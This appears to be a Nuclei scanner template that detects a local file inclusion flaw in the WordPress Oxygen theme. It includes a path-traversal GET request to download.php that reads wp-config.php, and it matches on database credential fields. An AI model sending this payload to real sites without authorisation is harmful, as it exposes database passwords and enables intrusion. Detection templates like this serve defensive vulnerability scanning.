id: wp-oxygen-theme-lfi

info:
  name: WordPress Oxygen-Theme - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
  reference:
    - https://cxsecurity.com/issue/WLB-2019030178
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-theme,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a004730450220501dde2e0abe54f70f1ee37149f6f947866ed31b6991964a1c7bf843d23de6f5022100c8da55dad58581fefc3e1f6d5332e366918ec85ea15d5848537c5b6f8d9e6eca:922c64590222798bb761d5b6d8e72950
